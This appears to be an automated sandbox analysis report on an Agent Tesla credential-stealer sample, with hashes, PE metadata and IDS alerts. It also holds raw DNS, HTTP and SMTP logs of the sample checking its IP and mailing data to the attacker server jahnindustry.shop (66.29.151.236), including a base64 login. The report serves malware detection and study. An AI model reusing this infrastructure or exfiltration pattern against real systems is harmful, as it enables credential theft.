                                              qtCWL0lgfX.exeGet hashmaliciousFormBookBrowse
                                              • 66.29.149.46
                                              Offer Document 24.lnkGet hashmaliciousFormBookBrowse
                                              • 66.29.149.46
                                              Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                              • 66.29.151.236
                                               Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                              No context
                                              Process:C:\Users\user\Desktop\Copy#51007602.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):716
                                              Entropy (8bit):5.350074230533824
                                              Encrypted:false
                                              SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhayoDLI4MWuPrePEnirkvoDLI4MWuCv:ML9E4KlKDE4KhKiKhRAE4KzeRE4Ks
                                              MD5:F7E80A89B59EFA3CAC428E12420D971C
                                              SHA1:DD2427B85EEC73FBD3C353E5F8D18CF2B8286B00
                                              SHA-256:0731A6A7ED19AAF142738A522427B3EC07B2A64CD105C4D999A301016A4C2DCC
                                              SHA-512:D41797D9C35DFE77511DEC89CB973F342346FCBB09ED1C2BF45521DE2860A002C809EECC765CA6B4D7030316D872AA2CD58EC4455DF279B04DB1BB347233ACA9
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                              Process:C:\Users\user\AppData\Roaming\itdtn.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):716
                                              Entropy (8bit):5.350074230533824
                                              Encrypted:false
                                              SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhayoDLI4MWuPrePEnirkvoDLI4MWuCv:ML9E4KlKDE4KhKiKhRAE4KzeRE4Ks
                                              MD5:F7E80A89B59EFA3CAC428E12420D971C
                                              SHA1:DD2427B85EEC73FBD3C353E5F8D18CF2B8286B00
                                              SHA-256:0731A6A7ED19AAF142738A522427B3EC07B2A64CD105C4D999A301016A4C2DCC
                                              SHA-512:D41797D9C35DFE77511DEC89CB973F342346FCBB09ED1C2BF45521DE2860A002C809EECC765CA6B4D7030316D872AA2CD58EC4455DF279B04DB1BB347233ACA9
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                              Process:C:\Users\user\Desktop\Copy#51007602.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):293997803
                                              Entropy (8bit):7.999958137275388
                                              Encrypted:true
                                              SSDEEP:6291456:oKyCoMaDMA1Nqr82YaR1WF9Tsc+51bq/Npev/fti7d:vaDJ1NcATI+eHFE
                                              MD5:C62B7992DB97A6341DACBE7E3D936C74
                                              SHA1:94F76F39F7792333AEC8E1FD50473AB99405C67A
                                              SHA-256:0C62EEE5960587F9C25CF53E7D8F19301F6DCA9C5F14456CA03EB19FD4DA2E86
                                              SHA-512:CC14879D59941C6C14CC9F504FF5149CE1C6392EB141B47DCB2249A7CA6D85E7F670A5C6020B4D16E28BBA0E7B4B2E499519B9B6095B9DDB15594B9BEB621540
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ZTf.................t&...........&.. ....&...@.. .......................`)...........`..................................&.K.....&...............(..'...@)...................................................... ............... ..H............text...$s&.. ...t&................. ..`.rsrc.........&......v&.............@..@.reloc.......@).......(.............@..B..................&.....H..........._................"..........................................*...(....*...(....*.0..E................(.... ....~....{....:....& ....8....8........E........8....*....0..................(.... ....8....8........E....-...........8(...*...}.... ....~....{....:....& ....8.....(@... ....~....{....9....& ....8.....2.{....(....*.....{....*......(....*.0..<.......s.......}......}......}.......}.....{............s....(...+*&...(....*...0..:.......s.......}......}......}.....
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.828089429289105
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Copy#51007602.exe
                                              File size:2'696'656 bytes
                                              MD5:d503277ebd054e3a3ccfe906cac2e6d8
                                              SHA1:f209eb92df97e2569897f5da1097ae0d5b8d4bdb
                                              SHA256:7c9fb1f9b7c24c9e0608af47b246b224e295ebc18aecfee6a104a7046d9db19a
                                              SHA512:24bbde7eb917886ffd032a0eca589074ec3bae6de31570ccdbeac410fb4f92cb9ad7ace1190714c855ce905be72c859d414b01538bc56825be93ab3cf30682b9
                                              SSDEEP:49152:inZcMf/Ci3p4GHOtjAaA4Dmn4WA3JQ//pk3MEksafGEwLw+Fq:iCMB0jAR4DmG5QnpwMEksRLw+Fq
                                              TLSH:29C5F103B36689DAF0852F31C4D72E1A13759E50224EDE066D7A33D62D323E2E85F5DA
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ZTf.................t&...........&.. ....&...@.. .......................`)...........`................................
                                              Icon Hash:8fc34a4c4c4ac70f
                                              Entrypoint:0x66931e
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x66545AD8 [Mon May 27 10:05:12 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Signature Valid:false
                                              Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                              Signature Validation Error:The digital signature of the object did not verify
                                              Error Number:-2146869232
                                              Not Before, Not After
                                              • 19/10/2023 21:51:55 16/10/2024 21:51:55
                                              Subject Chain
                                              • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                              Version:3
                                              Thumbprint MD5:CE375D7A0A494CFB6B46B4398281FD9B
                                              Thumbprint SHA-1:FBFF636EBB3DE3A9FD6A55111F00B16D2FDFCF3D
                                              Thumbprint SHA-256:80CA15275739BEF2CAF6E5A4168EB0A07FEB15883E8A4F232D93B8EECFE0F0EA
                                              Serial:33000003A4CBE356B8CB7FE4270000000003A4
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                               Name | Virtual Address | Virtual Size | Is in Section
                                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2692d0 | 0x4b | .text
                                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x26a000 | 0x28480 | .rsrc
                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x28fe00 | 0x27d0 |
                                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x294000 | 0xc | .reloc
                                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                               .text | 0x2000 | 0x267324 | 0x267400 | 7845c4ac766f12fa2473d5a5ec77e836 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                               .rsrc | 0x26a000 | 0x28480 | 0x28600 | 39b340c00dede396df520d3c3bc09ec8 | False | 0.09177268769349846 | data | 3.8272508816153104 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                               .reloc | 0x294000 | 0xc | 0x200 | 55a9c22f83f624a76dc718f3f2432c20 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                               RT_ICON | 0x26a460 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | | | 0.28763440860215056
                                               RT_ICON | 0x26a748 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | | | 0.46959459459459457
                                               RT_ICON | 0x26a870 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | | | 0.13540197461212977
                                               RT_ICON | 0x26be98 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | | | 0.18256929637526653
                                               RT_ICON | 0x26cd40 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.23104693140794225
                                               RT_ICON | 0x26d5e8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.2420520231213873
                                               RT_ICON | 0x26db50 | 0xfc4 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9199702675916749
                                               RT_ICON | 0x26eb14 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | | | 0.03896888795459323
                                               RT_ICON | 0x277fbc | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 26560 | | | 0.046654135338345865
                                               RT_ICON | 0x27e7a4 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | | | 0.05254158964879852
                                               RT_ICON | 0x283c2c | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | | | 0.053613604156825694
                                               RT_ICON | 0x287e54 | 0x3a48 | Device independent bitmap graphic, 60 x 120 x 32, image size 14880 | | | 0.06099195710455764
                                               RT_ICON | 0x28b89c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.08101659751037345
                                               RT_ICON | 0x28de44 | 0x1a68 | Device independent bitmap graphic, 40 x 80 x 32, image size 6720 | | | 0.10443786982248521
                                               RT_ICON | 0x28f8ac | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.13320825515947468
                                               RT_ICON | 0x290954 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.20450819672131149
                                               RT_ICON | 0x2912dc | 0x6b8 | Device independent bitmap graphic, 20 x 40 x 32, image size 1680 | | | 0.2377906976744186
                                               RT_ICON | 0x291994 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.2907801418439716
                                               RT_GROUP_ICON | 0x291dfc | 0x102 | data | | | 0.6317829457364341
                                               RT_VERSION | 0x291f00 | 0x3cc | data | | | 0.40329218106995884
                                               RT_MANIFEST | 0x2922cc | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators | | | 0.5642201834862385
                                               DLL | Import
                                               mscoree.dll | _CorExeMain
                                               Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                               05/27/24-15:15:09.558181 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49705 | 587 | 192.168.2.5 | 66.29.151.236
                                               05/27/24-15:15:21.815023 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49715 | 587 | 192.168.2.5 | 66.29.151.236
                                               05/27/24-15:15:21.815023 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49715 | 587 | 192.168.2.5 | 66.29.151.236
                                               05/27/24-15:15:21.815023 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49715 | 587 | 192.168.2.5 | 66.29.151.236
                                               05/27/24-15:15:21.815023 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49715 | 587 | 192.168.2.5 | 66.29.151.236
                                               05/27/24-15:15:09.558181 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49705 | 587 | 192.168.2.5 | 66.29.151.236
                                               05/27/24-15:15:09.558181 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49705 | 587 | 192.168.2.5 | 66.29.151.236
                                               05/27/24-15:15:09.558181 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49705 | 587 | 192.168.2.5 | 66.29.151.236
                                               05/27/24-15:15:21.814973 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49715 | 587 | 192.168.2.5 | 66.29.151.236
                                               05/27/24-15:15:09.558132 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49705 | 587 | 192.168.2.5 | 66.29.151.236
                                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              May 27, 2024 15:15:09.563138962 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:09.563149929 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:09.836204052 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:09.882370949 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:18.285738945 CEST49714443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:18.285769939 CEST44349714104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:18.285851002 CEST49714443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:18.289154053 CEST49714443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:18.289167881 CEST44349714104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:18.765933037 CEST44349714104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:18.766120911 CEST49714443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:18.772124052 CEST49714443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:18.772164106 CEST44349714104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:18.772496939 CEST44349714104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:18.826407909 CEST49714443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:18.870495081 CEST44349714104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:19.582072020 CEST44349714104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:19.582139969 CEST44349714104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:19.582216024 CEST49714443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:19.588444948 CEST49714443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:20.144752026 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:20.149946928 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:20.150089979 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:20.769536018 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:20.769779921 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:20.774854898 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:20.940330029 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:20.940650940 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:20.945594072 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.112571001 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.112854004 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:21.117763042 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.290049076 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.290302038 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:21.295233965 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.465789080 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.465991974 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:21.470875025 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.641460896 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.641686916 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:21.646563053 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.813536882 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.814973116 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:21.815022945 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:21.815045118 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:21.815064907 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:21.819856882 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.819932938 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.819996119 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.820039034 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:22.105259895 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:22.147955894 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:16:47.789150000 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:16:47.795377970 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:16:47.953844070 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:16:47.954039097 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:16:47.954103947 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:16:47.954241037 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:16:47.958960056 CEST5874970566.29.151.236192.168.2.5
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| May 27, 2024 15:15:06.407486916 CEST | 54705 | 53 | 192.168.2.5 | 1.1.1.1 |
| May 27, 2024 15:15:06.414974928 CEST | 53 | 54705 | 1.1.1.1 | 192.168.2.5 |
| May 27, 2024 15:15:07.765065908 CEST | 61331 | 53 | 192.168.2.5 | 1.1.1.1 |
| May 27, 2024 15:15:07.781482935 CEST | 53 | 61331 | 1.1.1.1 | 192.168.2.5 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| May 27, 2024 15:15:06.407486916 CEST | 192.168.2.5 | 1.1.1.1 | 0x68f0 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false |
| May 27, 2024 15:15:07.765065908 CEST | 192.168.2.5 | 1.1.1.1 | 0x2f4d | Standard query (0) | jahnindustry.shop | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| May 27, 2024 15:15:06.414974928 CEST | 1.1.1.1 | 192.168.2.5 | 0x68f0 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false |
| May 27, 2024 15:15:06.414974928 CEST | 1.1.1.1 | 192.168.2.5 | 0x68f0 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false |
| May 27, 2024 15:15:06.414974928 CEST | 1.1.1.1 | 192.168.2.5 | 0x68f0 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false |
| May 27, 2024 15:15:07.781482935 CEST | 1.1.1.1 | 192.168.2.5 | 0x2f4d | No error (0) | jahnindustry.shop | | 66.29.151.236 | A (IP address) | IN (0x0001) | false |
• api.ipify.org

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49704 | 104.26.13.205 | 443 | 4084 | C:\Users\user\Desktop\Copy#51007602.exe |

| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-05-27 13:15:07 UTC | 155 | OUT | GET / HTTP/1.1 |
| | | | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 |
| | | | Host: api.ipify.org |
| | | | Connection: Keep-Alive |
| 2024-05-27 13:15:07 UTC | 211 | IN | HTTP/1.1 200 OK |
| | | | Date: Mon, 27 May 2024 13:15:07 GMT |
| | | | Content-Type: text/plain |
| | | | Content-Length: 12 |
| | | | Connection: close |
| | | | Vary: Origin |
| | | | CF-Cache-Status: DYNAMIC |
| | | | Server: cloudflare |
| | | | CF-RAY: 88a645997cffc3f3-EWR |
| 2024-05-27 13:15:07 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 |
| | | | Data Ascii: 8.46.123.175 |


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.5 | 49714 | 104.26.13.205 | 443 | 3936 | C:\Users\user\AppData\Roaming\itdtn.exe |

| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-05-27 13:15:18 UTC | 155 | OUT | GET / HTTP/1.1 |
| | | | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 |
| | | | Host: api.ipify.org |
| | | | Connection: Keep-Alive |
| 2024-05-27 13:15:19 UTC | 211 | IN | HTTP/1.1 200 OK |
| | | | Date: Mon, 27 May 2024 13:15:19 GMT |
| | | | Content-Type: text/plain |
| | | | Content-Length: 12 |
| | | | Connection: close |
| | | | Vary: Origin |
| | | | CF-Cache-Status: DYNAMIC |
| | | | Server: cloudflare |
| | | | CF-RAY: 88a645e30b234269-EWR |
| 2024-05-27 13:15:19 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 |
| | | | Data Ascii: 8.46.123.175 |


| Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
|---|---|---|---|---|---|
| May 27, 2024 15:15:08.485460997 CEST | 587 | 49705 | 66.29.151.236 | 192.168.2.5 | 220 server1.coleoffice.shop127.0.0.1 ESMTP Postfix |
| May 27, 2024 15:15:08.485768080 CEST | 49705 | 587 | 192.168.2.5 | 66.29.151.236 | EHLO 609290 |
| May 27, 2024 15:15:08.647278070 CEST | 587 | 49705 | 66.29.151.236 | 192.168.2.5 | 250-server1.coleoffice.shop127.0.0.1 |
| | | | | | 250-PIPELINING |
| | | | | | 250-SIZE 204800000 |
| | | | | | 250-ETRN |
| | | | | | 250-STARTTLS |
| | | | | | 250-AUTH PLAIN LOGIN |
| | | | | | 250-AUTH=PLAIN LOGIN |
| | | | | | 250-ENHANCEDSTATUSCODES |
| | | | | | 250-8BITMIME |
| | | | | | 250-DSN |
| | | | | | 250 CHUNKING |
| May 27, 2024 15:15:08.648438931 CEST | 49705 | 587 | 192.168.2.5 | 66.29.151.236 | AUTH login c2VuZGFuZWxsQGphaG5pbmR1c3RyeS5zaG9w |
| May 27, 2024 15:15:08.819082975 CEST | 587 | 49705 | 66.29.151.236 | 192.168.2.5 | 334 UGFzc3dvcmQ6 |
| May 27, 2024 15:15:09.039319038 CEST | 587 | 49705 | 66.29.151.236 | 192.168.2.5 | 235 2.7.0 Authentication successful |
| May 27, 2024 15:15:09.039563894 CEST | 49705 | 587 | 192.168.2.5 | 66.29.151.236 | MAIL FROM:<sendanell@jahnindustry.shop> |
| May 27, 2024 15:15:09.218732119 CEST | 587 | 49705 | 66.29.151.236 | 192.168.2.5 | 250 2.1.0 Ok |
| May 27, 2024 15:15:09.218997002 CEST | 49705 | 587 | 192.168.2.5 | 66.29.151.236 | RCPT TO:<nell@jahnindustry.shop> |
| May 27, 2024 15:15:09.394697905 CEST | 587 | 49705 | 66.29.151.236 | 192.168.2.5 | 250 2.1.5 Ok |
| May 27, 2024 15:15:09.394860029 CEST | 49705 | 587 | 192.168.2.5 | 66.29.151.236 | DATA |
| May 27, 2024 15:15:09.557445049 CEST | 587 | 49705 | 66.29.151.236 | 192.168.2.5 | 354 End data with <CR><LF>.<CR><LF> |
| May 27, 2024 15:15:09.558237076 CEST | 49705 | 587 | 192.168.2.5 | 66.29.151.236 | . |
| May 27, 2024 15:15:09.836204052 CEST | 587 | 49705 | 66.29.151.236 | 192.168.2.5 | 250 2.0.0 Ok: queued as 4F18363DDC |
| May 27, 2024 15:15:20.769536018 CEST | 587 | 49715 | 66.29.151.236 | 192.168.2.5 | 220 server1.coleoffice.shop127.0.0.1 ESMTP Postfix |
| May 27, 2024 15:15:20.769779921 CEST | 49715 | 587 | 192.168.2.5 | 66.29.151.236 | EHLO 609290 |
| May 27, 2024 15:15:20.940330029 CEST | 587 | 49715 | 66.29.151.236 | 192.168.2.5 | 250-server1.coleoffice.shop127.0.0.1 |
| | | | | | 250-PIPELINING |
| | | | | | 250-SIZE 204800000 |
| | | | | | 250-ETRN |
| | | | | | 250-STARTTLS |
| | | | | | 250-AUTH PLAIN LOGIN |
| | | | | | 250-AUTH=PLAIN LOGIN |
| | | | | | 250-ENHANCEDSTATUSCODES |
| | | | | | 250-8BITMIME |
| | | | | | 250-DSN |
| | | | | | 250 CHUNKING |
| May 27, 2024 15:15:20.940650940 CEST | 49715 | 587 | 192.168.2.5 | 66.29.151.236 | AUTH login c2VuZGFuZWxsQGphaG5pbmR1c3RyeS5zaG9w |
| May 27, 2024 15:15:21.112571001 CEST | 587 | 49715 | 66.29.151.236 | 192.168.2.5 | 334 UGFzc3dvcmQ6 |
| May 27, 2024 15:15:21.290049076 CEST | 587 | 49715 | 66.29.151.236 | 192.168.2.5 | 235 2.7.0 Authentication successful |
| May 27, 2024 15:15:21.290302038 CEST | 49715 | 587 | 192.168.2.5 | 66.29.151.236 | MAIL FROM:<sendanell@jahnindustry.shop> |
| May 27, 2024 15:15:21.465789080 CEST | 587 | 49715 | 66.29.151.236 | 192.168.2.5 | 250 2.1.0 Ok |
| May 27, 2024 15:15:21.465991974 CEST | 49715 | 587 | 192.168.2.5 | 66.29.151.236 | RCPT TO:<nell@jahnindustry.shop> |
| May 27, 2024 15:15:21.641460896 CEST | 587 | 49715 | 66.29.151.236 | 192.168.2.5 | 250 2.1.5 Ok |
| May 27, 2024 15:15:21.641686916 CEST | 49715 | 587 | 192.168.2.5 | 66.29.151.236 | DATA |
| May 27, 2024 15:15:21.813536882 CEST | 587 | 49715 | 66.29.151.236 | 192.168.2.5 | 354 End data with <CR><LF>.<CR><LF> |
| May 27, 2024 15:15:21.815064907 CEST | 49715 | 587 | 192.168.2.5 | 66.29.151.236 | . |
| May 27, 2024 15:15:22.105259895 CEST | 587 | 49715 | 66.29.151.236 | 192.168.2.5 | 250 2.0.0 Ok: queued as 89D9763E54 |
